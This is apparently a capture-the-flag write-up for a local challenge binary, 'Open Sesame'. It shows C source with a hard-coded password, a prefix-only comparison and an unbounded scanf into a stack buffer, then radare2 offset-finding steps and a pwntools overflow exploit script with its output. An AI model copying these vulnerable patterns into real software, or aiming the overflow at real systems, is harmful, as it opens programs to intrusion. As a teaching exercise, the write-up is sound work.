Open Sesame

#define SECRET_PASS "OpenSesame!!!"

/*
 * Compare the user's input against the hard-coded secret.
 *
 * input: NUL-terminated string read from the user (must not be NULL;
 *        strncmp() on NULL is undefined behaviour).
 * Returns yes when the first strlen(SECRET_PASS) bytes of input equal
 * SECRET_PASS, otherwise no.
 *
 * Security notes (this is the vulnerable challenge binary, reproduced as-is):
 *  - Only strlen(SECRET_PASS) bytes are compared, so any input that merely
 *    STARTS with the secret ("OpenSesame!!!" followed by anything) is
 *    accepted.  The exploit later on this page relies on exactly this prefix
 *    match: it sends the password followed by the overflow padding and the
 *    check still succeeds.
 *  - SECRET_PASS is a plain string literal, so it can be recovered from the
 *    binary with `strings` or radare2's `iz`; strncmp() is also not
 *    constant-time, so the comparison leaks via timing.  A real check would
 *    compare the full string (strcmp, or better a constant-time compare of a
 *    hash) rather than a baked-in plaintext prefix.
 */
Bool isPasswordCorrect(char *input)
{
    size_t secretLen = strlen(SECRET_PASS);

    /* Prefix comparison only: bytes past secretLen are never looked at. */
    if (strncmp(input, SECRET_PASS, secretLen) != 0) {
        return no;
    }
    return yes;
}

void caveOfGold()
{
    Bool caveCanOpen = no;
    char inputPass[256];

    puts("BEHOLD THE CAVE OF GOLD\n");

    puts("What is the magic enchantment that opens the mouth of the cave?");
    flushBuffers();

    scanf("%s", inputPass);

# The binary is vulnerable to a stack-based buffer overflow: `scanf("%s", inputPass)` reads unbounded input into the fixed 256-byte `inputPass` array. It is a 64-bit ELF executable with NX enabled (the stack is not executable, but that does not stop the overflow itself) and partial RELRO. Note that the `i~...pie` filter below matches nothing; radare2 reports position independence as `pic`, so check that separately with `i~pic`.
i~nx,pie,endian,rel
endian   little
nx       true
relocs   true
relro    partial
# We can generate a 300-byte cyclic (De Bruijn) pattern with `ragg2 -P 300 -r` and feed it to the program to trigger a segmentation fault; because every fragment of the pattern is unique, radare2's `wopO` can then tell us the offset of whatever ended up in a register or on the stack.

dc
BEHOLD THE CAVE OF GOLD

What is the magic enchantment that opens the mouth of the cave?
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAAzAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFABGABHABIABJABKABLABMABNABOABPABQABRABSABTABUABVABWABXABYABZABaABbABcABdABeABfABgABhABiABjABkABlABmAB
ERROR, INCORRECT PASSWORD!
[+] SIGNAL 11 errno=0 addr=0x00000000 code=128 si_pid=0 ret=0

# Running wopO `dr rbp` looks up where the value now in RBP (the overwritten saved base pointer) sits inside the pattern, which gives its offset from the start of our input:
> wopO `dr rbp`
272
# We know that OpenSesame!!! (13 bytes) is the password, so subtracting its length from the RBP offset gives 272 - 13 = 259; that means we need 259 BYTES of padding AFTER the password -> ('OpenSesame!!!'+b"A"*259). The password prefix still satisfies isPasswordCorrect() because strncmp() only compares the first strlen(SECRET_PASS) bytes, so whatever follows it is ignored by the check.

# Next, find the offset of the data that was sitting at RSP when the crash happened: dump the stack with pxw and pass the first dword to wopO
> pxw @ rsp
0x7fffffffde08  0x41684241 0x42416942 0x6b42416a 0x416c4241  ABhABiABjABkABlA
[...]
> wopO 0x41684241
280
# 280 - 272 = 8, so 8 more bytes go after our padding; they fill the 8-byte slot that was loaded into RBP (the saved base pointer)
('OpenSesame!!!'+b"A"*259+b"B"*8)

# Let's make our exploit script
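#!/usr/bin/env python3
"""Stack-based buffer overflow PoC for ./open_sesame.

Payload layout (offsets measured with radare2's wopO on a cyclic pattern):

    "OpenSesame!!!"   13 bytes  passes isPasswordCorrect(), which only
                                strncmp()s the first strlen(SECRET_PASS) bytes
    "A" * 259        259 bytes  13 + 259 = 272 = offset of the saved RBP
    "B" * 8            8 bytes  272..279: the 8-byte slot loaded into RBP
                                (280 = offset of the data at RSP at the crash)

Without pwntools the same bytes can be produced with
    print("OpenSesame!!!" + "A"*259 + "B"*8)
and piped into the binary.
"""

from pwn import *

PASSWORD = b"OpenSesame!!!"
RBP_OFFSET = 272  # from: wopO `dr rbp`
RSP_OFFSET = 280  # from: wopO 0x41684241 (first dword at rsp after the crash)

payload = PASSWORD
payload += b"A" * (RBP_OFFSET - len(PASSWORD))  # 259 bytes of padding
payload += b"B" * (RSP_OFFSET - RBP_OFFSET)     # 8 bytes into the saved-RBP slot

p = process("./open_sesame")

p.clean()  # drain the banner and the prompt before sending
p.sendline(payload)
# Decode before logging: handing raw bytes to log.info() raises a BytesWarning
# ("Bytes is not text; assuming ASCII") as seen in the run below.
log.info(p.clean().decode(errors="replace"))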
python3 exploit.py
[+] Starting local process './open_sesame': pid 10635
/home/lavender/.local/lib/python3.11/site-packages/pwnlib/log.py:396: BytesWarning: Bytes is not text; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  self._log(logging.INFO, message, args, kwargs, 'info')
[*] YOU HAVE PROVEN YOURSELF WORTHY HERE IS THE GOLD:
[*] Stopped process './open_sesame' (pid 10635)

# The process stops right after printing the success banner, presumably because no flag file exists in this run; create a flag file next to the binary to test the full path.
